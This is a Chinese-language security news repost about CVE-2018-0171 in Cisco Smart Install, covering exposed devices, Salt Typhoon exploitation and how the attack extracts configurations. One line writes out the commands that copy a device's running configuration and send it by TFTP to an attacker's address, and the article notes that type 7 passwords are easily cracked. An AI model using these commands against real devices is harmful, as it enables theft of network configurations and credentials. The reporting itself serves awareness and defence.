七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

admin 2025年5月27日16:30:57评论19 views字数 1298阅读4分19秒阅读模式

更多全球网络安全资讯尽在邑安全

七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

Cisco 网络设备中一个存在了 7 年的漏洞继续构成重大安全风险,使攻击者能够在未打补丁的系统上执行远程代码。

CVE-2018-0171 最初于 2018 年被发现,以 Cisco 的智能安装功能为目标,这是一种即插即用的配置实用程序,旨在简化网络设备部署。

尽管年代久远,但最近的证据表明,此漏洞仍在广泛利用,凸显了未修补的遗留漏洞的持续危险。

漏洞利用了 Cisco 智能安装协议中的一个关键缺陷,该协议在设计上缺乏身份验证要求,并且在许多 Cisco 设备上默认启用。

这种组合为攻击者创造了一场完美的风暴,因为相关服务通常在 TCP 端口 4786 上运行,该端口经常暴露在 Internet 上。

最近对 Censys 的扫描确定了 1,200 多台可公开访问智能安装的设备,这表明全球潜在易受攻击的系统持续存在。

七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

检测到 1,239 台设备

ISC 分析师发现,该漏洞允许攻击者制作专门设计的智能安装数据包,以绕过验证检查,从而允许在受影响的设备上执行未经授权的命令。

“这个漏洞仍然特别危险,因为网络基础设施的更新周期通常比其他企业系统更长,”SANS Internet Storm Center 的研究人员在分析最近的漏洞利用尝试时指出。

该漏洞在与总部位于中国的高级持续威胁 (APT) 行为者 Salt Typhoon 相关联后重新受到关注。

据报道,该组织在 2024 年底针对电信提供商的活动中利用了 CVE-2018-0171,一位美国参议员将其描述为“我们国家历史上最严重的电信黑客攻击”。

尽管自 2018 年以来已推出补丁,但组织仍在运行易受攻击的系统,为攻击者提供现成的目标,只需最少的利用工作。

漏洞利用机制

利用过程包括连接到智能安装端口并发送特制命令。

使用智能安装漏洞利用工具 (SIET) 等公开可用的工具,攻击者可以在未经身份验证的情况下提取设备配置。

七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击
攻击通常遵循特定的顺序,从连接到端口 4786 的 TCP 开始,然后是提取和传输配置文件的命令:-
copy system:running-config flash:/config.txtcopy flash:/config.text tftp://192.168.10.2/192.168.10.1.conf

这些命令强制设备将其运行配置复制到 flash 目录,然后使用 TFTP 将其传输到攻击者的计算机。

由于 TFTP 以明文形式运行,因此攻击者可以看到整个配置(包括加密的密码)。

七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

快速说明

使用公开已知的 Vigenère 密码加密的 7 型密码可以使用广泛可用的工具立即破解。

通过提取的配置,攻击者可以识别管理账户、网络布局和安全策略。

此信息有助于进一步渗透网络,而不会创建可疑的新帐户或生成警报。

此漏洞的存在表明,遗留的安全问题如何继续对现代基础设施构成重大威胁。

原文来自: cybersecuritynews.com

原文链接: https://cybersecuritynews.com/seven-years-old-cisco-vulnerability-exposes-cisco-devices/

原文始发于微信公众号(邑安全):七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月27日16:30:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击https://cn-sec.com/archives/3952831.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息